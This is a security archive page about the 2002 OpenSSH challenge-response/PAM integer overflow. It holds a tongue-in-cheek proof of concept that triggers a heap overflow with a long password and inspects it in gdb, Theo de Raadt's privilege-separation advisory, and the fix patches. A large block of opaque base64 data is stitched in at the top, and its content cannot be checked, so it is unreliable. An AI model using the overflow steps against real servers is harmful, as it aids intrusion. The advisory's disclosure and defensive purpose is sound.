VyOhIkXPYUblTC1HlitNO8WZju7GvJhmXlT1QO8pEU5CCgur/ZZBsTFV1rj2RQyuBfNNC2pUR9Ca
W8hicvTC68VpATTto9OvBJqH2Th85qa97p89DeEkL1IuVX7yJ3sGfVSsU6E+FGjACOUyZZ6TtxUe
qdR5YQUrOcEjyLwJdE+YIlUDzaeXVl9gRHrPZQSFSvRwMCrgemIt3JAm62XII5z3IpnChbdR8qhe
BXNn7Nz5balXpgluFZqNY1wlckarbwekNyf1EW3Iyr9NoUms4D2SLP3WaD03Wuh6ocGQ1RD5FtI8
HAGAHO2ZxxGaO/OL2GzqmvE99La2vBt51ZWqZat2Bl2Pof6mqEYzqG44A0fq2wCdcpCq/gXDWurU
UFGMpN+E2pyVOv+3b3TmLZTLvAXy9TJwH2omJDEb01GJ+tyV7Os97zun61PtV2Eg9s/iayQ6aYpj
LD3vBUpKzxLSglsHjBxDlvUVDgfykmkrYqhRDQkn5A4RuJAhJZyVcFUUtyo3KEATdnSSBAtU77V9
0QFAGwWLsrswkLWzmWGdMG/1aD3v56zyVKMnwg7OJaUKqloNFl6z/TON6+/g5rBi/xues/Ev3cav
2P/2h/36/p/+PgDDYGd/b23/+12eJ9Aj+dQiKvU7he+w93UtoihPE9rcjsrxNhwj0x7yd9aZZ5hi
pjDMkBzC00iZvWXqoTeKU+Vfspu2qyLfTuIRVN3bfFsYUntLGeb+LVa7Av0zBL1YbUVVCmcphR82
TyjVq7Kh6m3pXt/pXfsOBCjzgsLKd/scf/CQdVbPPMtKa5WB7tPYk6HOeC7MTLhf7XbmrhqQ3XrY
0rV6d11aQvag5iM3pcp5iALbGVEfGiPTYlMwa3LHTh7hp3VJ0wnrotTj23bZG/bciLcahHdWAYNO
DuUf6zr7/uRnTPa2LKFMHmLHPM20wsMeGRlxHCFxyUc6ZA5TrzX1N5alKreyyZZ0bmuUXcshB6SE
aSAyaqOAQtWJCY7w5JLugm1b0QoPthhAyDCab42WW/hJtbX02KaANGfRuBIUtfSeBSOYpNJS68xk
cj5kS5cty3MO1ePcKtjnVV5UMfuDW1mc8sd2wM1IiLtYjDnOFmmSBYRPMvpdJgYnObiU7AJbLGXI
Ek/K+cPtbfm3B9872U29LL/YnlejbTuD27bstqtnNa9jT3hX7+IXY9ypAqSSLFMh+MUFNJYvZH6R
y14EcNm6U9+DGh0YFceljGgUSFXDXn8v+DcPfPCX66uJd2cT7ZLjuefuClstvFoq/BdfEmUgsM3V
s/Jtb9tthmjlcyrE5BVjTi/STC2J7uoANRwvoYCWn9lmoR6Pspb6DWItI9wSQSvgIsdWly+NW0gg
1Ao4MtKk76waOMJhceRdF6R+6ezfep9Sl6yJHQvMJFrQ15HupDBOXKg9O0gvpWZ04iulorMostnc
a/p5+b2S0Oo8wH5vPvdCJfNZFyeZ33xBkgBXvQcJvVy9CMm4S47Mp11mZH77pUXmi1xhYD75EiJz
U5ZfvWzIfOqlQh+rD+2a33BJ0Mfe/7XLgMzHbvz5WIUrN/uYT7jB52MV3nlTj/nVC3nM51+8cqMn
v3bBitHd+kSNbZD53KmA1cMJxl47BGJvarDW5o/sZiFvIox3cjCKyKKZnKHjfm/+ZVJocyunKKp5
SCr5zdkpzc2IXq5pK6a33wrp3e+bJjx3BaHdV450v8ZY1Dt6T09enLw+ffyn/b0dL955sG+qOPxL
v4N+dkU2x+8iuEVJVx27i/pv3xt2LkXilV92OsWykJ+7HeHVIj/udVRUz3KU6ncETEwmKDfoXCCs
vmt9LYiqYPGlaNyImQ5MUoRr4xJZvciqDZhMsvQNQVkq0qAgza907W883tGz0xfH3slPr569PH1z
+Ob05Qvv5RPgtGPv+PDkufx5+6X6oUcFRG3ZgbRVE/Sw5yL4JwQk1nixuv7AgUK7Zhj0vONIlpdW
VSl6tv39CnOqwSKUV27RrYrFOq/U4cWUNoX3KdXS90Gra7/r1zcOMvEceojDsbMliwgrsPWAMJCw
U+wQIHxICaBL+R+waThi5UFZ2s1zFQcNOwzr8dC0r6KEuho0AzhMl3QYMHcKEHUS01igOlQ19eHm
2WugXK8a2cVw2kEnVqdX4/BWD2QnxyHrCBzYoMeXDJQGSwzSN2V2GUE5iS3ne0zHnwmbp3LIBcah
h5zvM8clYkZnWRcnqIrplhOpk5e8lCQVXXhACwvMs3O7kSVDj+qaCioV4P9gLfU6H22QyrGGbcJp
H3DkYRy1b9WJhlkks1rA667SkzE3mZmFr+hbzZA+kZN9ChO7M2uqeYXhFYXeJ5FCc9gRKC1yPVbJ
JZn172qi+6+H5DaXTHmckiY+i1W33/3tA62zu9rXu1901Du9u05YPdZIbL/U/OGNhV/Q99FkisSV
8pJpjnvVnqpnXinC+iwuO6+fnT4/f/zqLWWP7jfOd3QoJ02EeE86BnksS+9KRkFqrml6qUyQFTui
fVdkOgtfCJ7qJrq+tRKrA43AQ6FmA/ittzMl6oRHjq+7XYS6eVZEta9MMwT1pkkiFQ+hFzH1drqh
7r9pQqh18h34JVpX+m6dhbj2dCqj1G1Zp3hBeLKVO1RLTo9d5+M4UzaLxRHZxcDS44zT2NxUY3Cg
muN8VTi2yYt13A6p1E6PBgitjDUZtCrpb07HoO9b11kwgbkAutw6C5I0EE8t62ZE0hNxrbhpw6lR
pTBNEifmBgK6t9vFFNeTEMPXKIqxkCawnLf1Nn24ykY8o/S0WWhB/27bCKMtefBThRFDu85utxbC
mF0ZmlPns63CInZG89IbbsiMPVE6ZmR7qaiJrsByfjDwW+R+OLMN9inu4fz1WQqYZfeBT3cY39sb
DH34E8jfQ/lwXz7akU/0LT0pnDNCaJo9+MHtQWPO5GRx0lCTL6g5EjrAMlEUIqenPR40CD8IQ2xm
taUYd+UXLVNuIDoKxeEf4MYcRog5H0H1A6Ty0Jg7WeQ5gPAqmyR3luakHszC57yHefuc9zDT0lEb
wE/H8x4VJDWlgequcOJXym4Qrj8t28RG80JrI9bmC2xC2rKsX3jNxeBu1+zKu3dihxHuVQ43TSwJ
ZFIzEV7MKHlvJP1dxKEMiDCmYP8ZPP6L5ay6E8l0my26soMBUwob2mr3Orj8Xs97IQNvCOfWiDs1
kXW1c4oWL1rCtxBiaCx4gUYkUnnphhN1eVtErdkLg3sbLmQcZ/kR5XSHwRHK6iNVa7x0/qO1vaaH
a/5UrZiO6Q5/jHtw9jg3WKBHQJsFwlXl7aG/hyZOFeLzowP9yJjTsuV3CW6eK1CD3ytjljX0vzEQ
NeYb6VlOpqVTaSwDsHIhPV3Vo/unlSmob+yZMgcbhI+f/jxoFzEsol/LXgatYk0zXh4FNaz1yoSz
EBq8iGg8cu1rVDdjM3JZPCOj2Ot79LmVQZYLWNk3VnqxQTrbwK/FBmbl3r1UCf3evXuk93vv5Lf3
77ZvPlt4vn1/Q6bG8z83/jRb4eonO7T5rHyw1zefxV9AVec4UM53oSthRV+imn5fLfKbvG0RLgUX
mbW1cmHjojYWw4ZIiUDNxYiHICHcQEdtQiiyBqXftunbuIHmmCKpGPeSrPeGNUrGWLP67Mis2QW3
P9TNWrmPbAF+ajh7901HDbPxDZuyRkd0HUorYC5fSUfX4jVy6MMLflJhcqZxyTwRPu/MdBzjluby
2eHRmUt+cUNZZBRTaAgEzEijJeCrJpOxEG4S59ECXYKCUgAgxMt9hYUtvqZOfGDTW2HDzVJGpM0y
a3ipkW3Nl26fivR2azPA3GsYoA0iuGPKWywZDD8tyX/QD2Uj6l4hR7La5e2a7Plt5liHspj9vuNS
jVbDhgH0vJfAS4sY6Qd5la4eS1y9uJTJ+RPGqaMOP3Fb3L0nvkAdmMaBVCW8Zh16/Ac/K/b/3fOj
Z4ffffE2fs3+v7c3cPb/wQEc/gY7e/29tf3/93g2Dq0iyjucLQWyQPkJXRHhhIY9xbmIEEeu2BEM
4/CWApNS0y+ixoQRP3ZFHifyDutaBAW9xBgBeOy+P46KWUbonaOZOmZFWksiYeA9c+KKniDFUsm6
xlPnThd4c8iWvvfEFXsSpKm0UFTIFeSFgvHgqiRSfDSW2p66Yk+jTE43KTejH4AUZeYzKZlXAre+
c+W+i4DJfVWVApmjsnJaXfTMqStzGgbsVphrnn/rh5cEl9LAX12pvyJHD8uVWXbpJUuERy29WSzz
ehn1zPeu4PdQ9NkpU+e4S3sGy3iv5a1nruSzKGPBAucgzxLE+HjQrcoiPHfFngdV2FS4iOYlJ1rj
sXzvhSv3IrqS9eRIYs3UE6VV3DMvXYGXSXwl7edVWhvg644tEt975Qq+yhHjUOZUYIZwl7Lho6Nc
Cpq/uXJ/q3Bfe6qDCNJLLTSLETr22hV6Pc3CwK8zQukS4PTvmTNX5qyS11nNPMhjZChTiIB0xW9c
oTcifekKTJJoYa+Kpzn/rSvyNg087U0Sz+cgIJBlIEsbxIK8fnDlfoiVLIr/rgK25qgH2dJEyPzR
FfwxTmMZTCSoKQyVNuSg90UWsAV+ivIxoxzC6EoEQh3fTMr0zM+uzM9I+INuFfRdDbmQI20Y3fq7
K/j3OEkcLWI6EUpAGzdU3Ru30PnWlncS8pb0p1kuZ/QG9EJPZaMKiHucC9KTKZNNt2HMc9mk2Lh/
reSrgc+bHqGvlpVRIwEziiFC1sMnJK3okvnG6AwDa3gI/9ngIsPl6BCV1QeDy5ow+rRDGsXqFUwG
RzMD0O8IWrpRwnUVmZTFBP8UNphHo5RbNc7miHzU6oCW4LhENw+FlQks95SYLCaV9bliZKrN0VRM
43lXUbJDrdFMpHh0dhzldZwK4lOlzOnZGQFcQadXp0gAJnUuHkdnx0iaIMxwZhPhOe8gzY7meYcW
X0fX0sC8bARkbRhGbGWgo0hzJdwTsI//YpvSMBiXFUUTp2cYJdEjz3snPZR+ReF7Kh9tRG3I2FBz
z1O3HSuPw9cF3YaMDW2XEzDsLY6j2ogARI5xSgU1HFcd1GxWpVgD2DkybAmG2FjNqk1Fhy8/MPef
MCupQlXUeKsoEXvIvsic0gIB51KZKKyI8hp4TvgqXI3pqiU11JOlVdmsc6ppYXKxavRB+Lhi7ZmT
jfnGAoktpArqP6Sz28U4SOaQsGNE3MoMHqawZBWag8+Gsc+oDbDq1hHeZ5gQfM3n8xz6cOT4ln1j
feoCbgCarYoVz9IRCZweYwORtPr9BRUX1KuDR0HzkCM9ZOSdvn7sdFBt4omtdsgujTCzYVd9XI57
MKlj1vWCP0yhDP05Uosd97penI83C3dY2abhqJJGNvna+KpoOyMJlTrpku7MoyCkXgJvBy0CbG/t
MViCzyLWk9bpsGiJK7jv5ZiIJ/U1hDJkpWeKSzJD6hA3Q77O2DotuzchNYZZlmu4NAfi7LrovNnp
ei/TdpcuojSm3YIJ1s4y+GILBkFKC72OhDMXML5/TluIVHuRB8W80bMKC5iXbmXiJFA3wEid9WSS
TsM4g6qATSTjYFZW3ADCj2GOhLC0GdaOaqREGJpjpvXLnNBLOTWJ1OUoaE0ATaaXwoVkmZguAN2u
4EXOK9llgk5fPZZuPA+WI6STc5YQaomEqIPa9xqWRxzQ8LHT0Hjl4NpHz9WoimPop2Q9Ygq5qW8d
4zEFMnjsMnVqEkJ+kS18BSKtmAZH/FNYDVLn46FhBja3jO446bndNFwKZKsuCFegxyow2lToYhy5
jCDkJDZVIsny5ZmQZxoKl7XWIWYBCBIq523iSRpaoLmhWWUUOfaNzVSfNG5rpFAGTipGULQOAGvy
+2jGHM4hhtYpHjHE2Xpg+faICGyHASyhpufixzNBODF9/523pMWSVKbe9hzUisAx7qLG2ttzVRkl
qx6Ma64tRKRabk3zarl0yO3OMEn4run60Zbh3rGqMKZbnMWlC/NuO8Sn3n3sxRAZKOJRpRu8M2fU
z21P3cJXtSlgzhjpGsYFNNaHieyEx3ARDcJICWtSCchnFJk6iOI9ezAwJwAyhsjn0jsiPZ4TzLl4
kSFVRgDGByBlTe6Csalq92+cYvWloUkgWNcafEiWVLpA1vHxEW12eaAORkpiqGjDsZ0NN9Uf8U9u
QgK8l84uYA9el6SiZn++qnjVGxtIPLD+EF95IqzIuArBB7RtRSmjc+jIsCFDBHzY8Oy1mc5sFxCV
Wm31Src60mgRyD4EQphxSrvKBjTWRpgXdgRYvyrBHL1iNujUs0lvFRsDIWPbOLWGuiJTjhzpXrCK
bbwr3/AkBchbQujaVOOruxxS09DQK/fGXFrlXgY4+2iD65oR9OnwQAJUi6kvBFP0OovvChbjXORL
zaPgmH5mI9WuBHzNAY0a89g0nsG1MMvlHSVB9ANmYfU3oqEOmjpuFrjzELsjZUmUqg+zhneVOhm1
/VMQgmYK4YROmDTbeeVjWqGuRW6cJTNv9bD6wuOVGEtmPZ3IWT+exheyfZg6V/rdufWJy58xonCN
4DIQ9ahcfOU3aXanzGtSOD11C8tNsjHP0yztKv+y54mW2rDnw0at2Eb25aVvg7AsBxEaZA4JWR5V
LdfHNUwwRQY2qRwqBHxg7lxVSV/GDPRUdyKEB6HHwvqwWnow2BglrXoS4F6QunYXiOYCxOZZnUMH
qy8thdxIzFwrC8E5dqu8iNSCGKizFlKWjvMI8qaTAPSD9vZG5PFpcyYCrJMEpLbFoicQOO4Jch1P
e8KqvQ5U6Hj7RYSUPK/y7CrTw/5Y3vHO0ngyoTNOK9AA8XwKgQ953ViNChvaClwJ507uAFMdA2D7
T/fpeuWtZzBzhGDe7F6ofXGblS6j8TRFyuwlQcilvIwdoeJAnVV7Zk8UCL6WmcVA249P35zazOqe
mwCWdoYXcIdmCZ244iva0m/nAfeoLOOLJ2dNWQZ3kBpOT948aT4XqQPO63nbGZ4YhjYJyxp5b4/6
UNiYEWc0eei91GRArdT5tT0H52Rz9POIocxK6GSTDTkPlMJvH6RuWTrT2B2GX1n+u7DBoXZKnGSr
rhMF8XGd5/6iLQ9az4lHxjzNNdwi836ILwQ1pLgYEJteD8QgLRZqfOJIkBlUpXwiLLft5Ci1DJzh
PKHGitpm46Ldco/ezxCU6URvEwbDYyXg2reK8hBeWnmBbpg850M1fOLLWMRUZqFvra0Tv3EaADRn
FnK3oKdVWdV+ntoMUCAPMkU/NzuStnqDjgovYPL8rAJjRyok63BkGWlWRA6SIegwq0YiknkwazOt
+R3nTQ0ysH6p3SAgEngR1Ayipio57um1Oc1u7H26bgQWDI0sm9PjhhEWgA4yhQvGV4PdOnd+TSjP
1y4jwfLso3MXdNInFCrWraGTT6OSGqlRBsu3y8b1S5Ru8cZHyHvI0oHUVFGedV27mcYN03dsbmex
5pYXWUjZD0kfpevEfQX5LPgQTiGFGwILULFsGB0pZmBLuJGu5CjJxpdNoLfK6S4NlasIWjFB8cxn
r3PqIYg5QQcRM8TMIitrxADV8LwoEt0G06qtcLLJpaDFsb6W6jPgwLsIDQDuNdqDuKnh/gKukH4K
MU9VYdGQsijBenJQRy5dnNptCYA14CQORbYfZeGyi9gWJkOpPVNU1rSQs3ZmhXfEoOud2BNBK76w
t0bUoduNFEHvFbIaqlBo/qSvMC6uA7EThPfMvWHXO9SAKVhCmS5FqutN5Uzmpwxapr+g6gc2BIDI
EDc8l3ePNdYNF84VjH0jZenq3Ii1dSsiPdjBsKLx46endnvIQWLt9UWZzedqN95Is3wWJBvukgmG
j7B+dsDiSAv5hMdgN6JKThT9JAh8uWDbzRrq2j1iHT86NmHd+PSWjJrTb2vWnjreuRhHCIbMbIg8
q2i8B9wWtOOUFna79HehP8FUOLhIGFNZCUH1cDylwzI9TYtG9HW9R6coDbARwWyljFuvEZFzZz7F
rVxF7NdnoG8VXVR70SWGnC1TfYxWYp0FAMDcHrAIDDBNOjSGeOgSHDg5hS40VVEoHYHbyQrudb0j
2LiPsiB/5JKHaaY5CPu6V7H3Cevp3OrQqEj2qhBveGFzTOpQWgmEglKzB1FzInIpx0Wdu7v8wipD
D4+fW8wk408ECax+ZXckdVSYABtaQLU1juGZQJAJ/PGgpswhaFJ1Hmu+tTrhoghGkDxT73AWIak/
wb4w16Xl+LBnLAGEAs3DCdanICdRENKoMBSRkwgsbkJhELGyf2vCcWqDDALGQnlpINJ5VsZFPPOt
pEWQbWGG3kWQMauKmgjennmv9B38HE832lULGzzR1AuUbtTQ5h3Jga28M8zyS3tChJnuTKIK6qc+
ZCMqALNEkxkg+hJTnDdZURUDIKYngJ9isCxapyM9X+qMgis6FqtxhbGNOldc/+Ih5ZbV19bj5cmt
fj31uvj6njCpkB+jY7oCaJrHJqX2BEn1RhlyTWF/0nEkmMAG8lRGd4ScAb21o8P6WT/rZ/2sn/Wz
ftbP+lk/62f9rJ/1s37Wz/pZP+tn/ayf9bN+1s/6WT/rZ/2sn/Wzfv6/nv8FCTLgXADIAAA=
Update (06 January 2003)
======
From Mickey Mouse Hacking Squadron [mmhs@hushmail.com] (hmmm sounds
like goobles :-) ) advisory :
The following proof of concept is reproducing Global InterSec LLC
findings, enhanced with the patented research performed by Mickey Mouse
Hacking Squadron against OpenSSH 3.5p1.
First of all, the OpenSSH 3.5p1 server has to be built (with PAM
support enabled):
$ tar xzf openssh-3.5p1.tar.gz
$ cd openssh-3.5p1
$ configure --with-pam
[...]
$ make sshd
[...]
Before the SSH server is actually executed, the sshd_config file should
be modified in order to enable PAM ("PAMAuthenticationViaKbdInt yes").
# sshd
In order to reveal the nature of the OpenSSH vulnerability, the next
step is to connect to the SSH server:
$ ssh werewolf.research.mmhs.com
Password:
Thanks to the "Password:" prompt, it is clear that PAM is actually
enabled (otherwise, the prompt would have been "user@host's
password:"). This unique fingerprinting technique was investigated by
Mickey Mouse Hacking Squadron, and is already present in the latest
version of the Mickey Mouse Hacking Squadron award winning network
vulnerability assessment tool.
After the previous command was executed, the freshly spawned sshd
process has to be examined with a debugger, in order to set the correct
breakpoints within the input_userauth_info_response_pam() function of
OpenSSH, as demonstrated in the Global InterSec LLC advisory:
# gdb sshd 6552
(gdb) disassemble input_userauth_info_response_pam
[...]
0x80531bc <input_userauth_info_response_pam+192>: push %esi
0x80531bd <input_userauth_info_response_pam+193>:
call 0x807306c <xfree>
[...]
(gdb) break *0x80531bd
Breakpoint 1 at 0x80531bd: file auth2-pam.c, line 158.
(gdb) continue
Continuing.
Now that the buggy call to xfree() can be intercepted, the SSH client
should trigger the integer overlow and the resulting heap overflow:
$ ssh werewolf.research.mmhs.com
Password: <type a thousand 'A' characters here and hit enter>
After that, the xfree() breakpoint is reached, and the next call to
free() should therefore be intercepted in order to comply with the
technique developed by Global InterSec LLC:
Breakpoint 1, 0x080531bd in input_userauth_info_response_pam (type=61,
seqnr=7, ctxt=0x809c050) at auth2-pam.c:158
158 xfree(resp);
(gdb) disassemble xfree
[...]
0x807308e <xfree+34>: call 0x804ba14 <free>
[...]
(gdb) break *0x807308e
Breakpoint 2 at 0x807308e: file xmalloc.c, line 55.
(gdb) continue
Continuing.
Breakpoint 2, 0x0807308e in xfree (ptr=0x809dfb8) at xmalloc.c:55
55 free(ptr);
(gdb) x /10x 0x809dfb8
0x809dfb8: 0x41414141 0x41414141 0x41414141 0x41414141
0x809dfc8: 0x41414141 0x41414141 0x41414141 0x41414141
0x809dfd8: 0x41414141 0x41414141
From here on, as demonstrated by Global InterSec LLC, exploitation
becomes trivial. For more information on exploiting calls to free() see
the excellent Phrack article "Once upon a free()" [2].
WORK AROUND ?
-----------
As mentioned in
http://www.openssh.com/txt/preauth.adv,
and as demonstrated by noir in
http://www.phrack.org/phrack/60/p60-0x06.txt,
"you can prevent privilege escalation if you enable
UsePrivilegeSeparation in sshd_config."
SOLUTION
Post from Theo:
I can say that when OpenSSH's sshd(8) is running with priv seperation,
the bug cannot be exploited.
OpenSSH 3.3p was released a few days ago, with various improvements but
in particular, it significantly improves the Linux and Solaris support
for priv sep. However, it is not yet perfect. Compression is disabled on
some systems, and the many varieties of PAM are causing major
headaches.
However, everyone should update to OpenSSH 3.3 immediately, and enable
priv seperation in their ssh daemons, by setting this in your
/etc/ssh/sshd_config file:
UsePrivilegeSeparation yes
Depending on what your system is, privsep may break some ssh
functionality. However, with privsep turned on, you are immune from at
least one remote hole. Understand?
3.3 does not contain a fix for this upcoming bug.
If priv seperation does not work on your operating system, you need to
work with your vendor so that we get patches to make it work on your
system. Our developers are swamped enough without trying to support the
myriad of PAM and other issues which exist in various systems. You must
call on your vendors to help us.
Basically, OpenSSH sshd(8) is something like 27000 lines of code. A lot
of that runs as root. But when UsePrivilegeSeparation is enabled, the
daemon splits into two parts. A part containing about 2500 lines of
code remains as root, and the rest of the code is shoved into a
chroot-jail without any privs. This makes the daemon less vulnerable to
attack.
We've been trying to warn vendors about 3.3 and the need for privsep,
but they really have not heeded our call for assistance. They have
basically ignored us. Some, like Alan Cox, even went further stating
that privsep was not being worked on because "Nobody provided any info
which proves the problem, and many people dont trust you theo" and
suggested I "might be feeding everyone a trojan" (I think I'll publish
that letter -- it is just so funny). HP's representative was downright
rude, but that is OK because Compaq is retiring him. Except for Solar
Designer, I think none of them has helped the OpenSSH portable
developers make privsep work better on their systems. Apparently Solar
Designer is the only person who understands the need for this stuff.
So, if vendors would JUMP and get it working better, and send us
patches IMMEDIATELY, we can perhaps make a 3.3.1p release on Friday
which supports these systems better. So send patches by Thursday night
please. Then on Tuesday or Wednesday the complete bug report with
patches (and exploits soon after I am sure) will hit BUGTRAQ.
Let me repeat: even if the bug exists in a privsep'd sshd, it is not
exploitable. Clearly we cannot yet publish what the bug is, or provide
anyone with the real patch, but we can try to get maximum deployement
of privsep, and therefore make it hurt less when the problem is
published.
So please push your vendor to get us maximally working privsep patches
as soon as possible!
We've given most vendors since Friday last week until Thursday to get
privsep working well for you so that when the announcement comes out
next week their customers are immunized. That is nearly a full week
(but they have already wasted a weekend and a Monday). Really I think
this is the best we can hope to do (this thing will eventually leak, at
which point the details will be published).
Customers can judge their vendors by how they respond to this issue.
OpenBSD and NetBSD users should also update to OpenSSH 3.3 right away.
On OpenBSD privsep works flawlessly, and I have reports that is also
true on NetBSD. All other systems appear to have minor or major
weaknesses when this code is running.
Update (27 June 2002)
======
Solar Designer adds : for the privilege-separated OpenSSH sshd, please
refer to Niels Provos' web page on the topic:
http://www.citi.umich.edu/u/provos/ssh/privsep.html
Patch provided by Markus Friedl :
Index: auth2-chall.c
===================================================================
RCS file: /cvs/src/usr.bin/ssh/auth2-chall.c,v
retrieving revision 1.18
diff -u -r1.18 auth2-chall.c
--- auth2-chall.c 19 Jun 2002 00:27:55 -0000 1.18
+++ auth2-chall.c 26 Jun 2002 09:37:03 -0000
@@ -256,6 +256,8 @@
authctxt->postponed = 0; /* reset */
nresp = packet_get_int();
+ if (nresp > 100)
+ fatal("input_userauth_info_response: nresp too big %u", nresp);
if (nresp > 0) {
response = xmalloc(nresp * sizeof(char*));
for (i = 0; i < nresp; i++)
B:
Index: auth2-pam.c
===================================================================
RCS file: /var/cvs/openssh/auth2-pam.c,v
retrieving revision 1.12
diff -u -r1.12 auth2-pam.c
--- auth2-pam.c 22 Jan 2002 12:43:13 -0000 1.12
+++ auth2-pam.c 26 Jun 2002 10:12:31 -0000
@@ -140,6 +140,15 @@
nresp = packet_get_int(); /* Number of responses. */
debug("got %d responses", nresp);
+
+ if (nresp != context_pam2.num_expected)
+ fatal("%s: Received incorrect number of responses "
+ "(expected %u, received %u)", __func__, nresp,
+ context_pam2.num_expected);
+
+ if (nresp > 100)
+ fatal("%s: too many replies", __func__);
+
for (i = 0; i < nresp; i++) {
int j = context_pam2.prompts[i];
Update (06 January 2003)
======
No further comments yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
